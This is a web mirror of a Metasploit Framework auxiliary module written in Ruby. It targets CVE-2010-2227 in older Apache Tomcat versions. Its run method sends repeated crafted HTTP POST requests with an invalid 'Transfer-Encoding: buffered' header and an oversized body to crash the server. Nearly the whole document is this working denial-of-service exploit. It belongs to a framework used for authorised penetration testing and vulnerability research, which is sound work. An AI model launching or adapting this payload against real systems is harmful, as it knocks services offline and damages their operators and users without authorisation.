Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
19638 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',

15
        'Description' => %q{

16
          Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not

17
          properly handle an invalid Transfer-Encoding header, which allows remote attackers

18
          to cause a denial of service (application outage) or obtain sensitive information

19
          via a crafted header that interferes with "recycling of a buffer."

20
        },

21
        'Author' => [

22
          'Steve Jones', # original discoverer

23
          'Hoagie <andi[at]void.at>', # original public exploit

24
          'Paulino Calderon <calderon[at]websec.mx>', # metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2010-2227' ],

29
          [ 'OSVDB', '66319' ],

30
          [ 'BID', '41544' ]

31
        ],

32
        'DisclosureDate' => '2010-07-09',

33
        'Notes' => {

34
          'Stability' => [CRASH_SERVICE_DOWN],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        Opt::RPORT(8000),

44
        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 25])

45
      ]

46
    )

47
  end

48


49
  def run

50
    for x in 1..datastore['RLIMIT']

51
      begin

52
        connect

53
        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")

54


55
        sploit = "POST / HTTP/1.1\r\n"

56
        sploit << 'Host: ' + rhost + "\r\n"

57
        sploit << "Transfer-Encoding: buffered\r\n"

58
        sploit << "Content-Length: 65537\r\n\r\n"

59
        sploit << Rex::Text.rand_text_alpha(1) * 65537

60


61
        sock.put(sploit + "\r\n\r\n")

62
        disconnect

63


64
        print_error('DoS packet unsuccessful')

65
      rescue ::Rex::ConnectionRefused

66
        print_error("Unable to connect to #{rhost}:#{rport}")

67
      rescue ::Errno::ECONNRESET

68
        print_good("DoS packet successful. #{rhost} not responding.")

69
      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

70
        print_error("Couldn't connect to #{rhost}:#{rport}")

71
      rescue ::Timeout::Error, ::Errno::EPIPE => e

72
        vprint_error(e.message)

73
      end

74
    end

75
  end

76
end

77


78